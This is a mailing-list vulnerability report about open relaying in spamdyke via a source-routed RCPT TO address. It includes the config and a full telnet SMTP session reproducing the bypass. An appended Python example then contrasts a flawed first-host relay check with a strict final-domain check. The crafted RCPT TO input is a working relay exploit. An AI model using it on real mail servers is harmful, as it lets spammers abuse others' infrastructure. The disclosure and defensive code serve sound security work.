Hi folks,

After a recent scan of our servers (having only just deployed spamdyke), we've discovered what we believe is a security issue with spamdyke which will allow open relaying.

It looks like the issue has to do with multiple recipients being specified in the RCPT TO line, and the first recipient being just a valid host in the rcpthosts. The end result is that mail will be sent through to whatever other addresses are specified.

Setup is as follows:

~$ cat /var/qmail/control/rcpthosts
example.com
~$ cat /etc/spamdyke/spamdyke.conf
local-domains-file=/var/qmail/control/rcpthosts
relay-level=normal
smtp-auth-level=observe
~$ telnet localhost smtp
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 localhost ESMTP
MAIL FROM: [email protected]
250 ok
RCPT TO: <@example.com:[email protected]>
250 ok
DATA
354 go ahead
Subject: Test
Test body
.
250 ok 1278906723 qp 27089

Regards,

Chris Boulton
Lead Engineer
BigCommerce / Interspire
Email: [email protected]
Web: http://www.bigcommerce.com
Web: http://www.interspire.com
Australia: +61 2 9262 7770
USA: 1800 939 5570

_______________________________________________
spamdyke-users mailing list
[email protected]
http://www.spamdyke.org/mailman/listinfo/spamdyke-users
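The RCPT TO argument in the session above has the RFC 5321 source-route form `<@host1,@host2:local-part@domain>`. The following is an added example, not part of the original post and not spamdyke's code: a relay check that decides on the final mailbox domain and ignores the route, beside a flawed check that reads the first host in the path. All function names and the address `user@other.test` are constructed for illustration; how spamdyke actually parsed the path is not stated in the post.

```python
import re

# Mirrors the rcpthosts file shown in the post.
LOCAL_DOMAINS = {"example.com"}

# RFC 5321 Path: "<" [ "@dom1,@dom2" ":" ] local-part "@" domain ">"
# (address literals containing ':' in the route are not handled here)
_PATH = re.compile(r"^<(?:(?P<route>@[^:>]+):)?(?P<mailbox>[^<>]+)>$")

def parse_rcpt_path(arg):
    """Return (route_hosts, local_part, domain) or raise ValueError."""
    m = _PATH.match(arg.strip())
    if not m:
        raise ValueError("malformed path")
    route = []
    if m.group("route"):
        for hop in m.group("route").split(","):
            if not hop.startswith("@") or len(hop) < 2:
                raise ValueError("malformed source route")
            route.append(hop[1:].lower())
    # The last '@' separates local-part from domain, even if a quoted
    # local-part itself contains '@'.
    local, sep, domain = m.group("mailbox").rpartition("@")
    if not sep or not local or not domain:
        raise ValueError("mailbox needs local-part@domain")
    return route, local, domain.lower()

def naive_domain(arg):
    """Flawed (hypothetical): takes the host after the FIRST '@'."""
    return re.search(r"@([^:>,]+)", arg).group(1).lower()

def relay_allowed(arg, authenticated=False):
    """Decide on the final mailbox domain; the route is never trusted."""
    try:
        _route, _local, domain = parse_rcpt_path(arg)
    except ValueError:
        return False  # reject anything that does not parse cleanly
    return authenticated or domain in LOCAL_DOMAINS

if __name__ == "__main__":
    # Constructed sample inputs, modelled on the RCPT TO line in the post.
    for path in ("<@example.com:user@other.test>", "<user@example.com>"):
        print(path, "naive:", naive_domain(path) in LOCAL_DOMAINS,
              "strict:", relay_allowed(path))
```

For the source-routed path the flawed check sees `example.com` and accepts, while the strict check sees `other.test` and refuses unless the client is authenticated.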
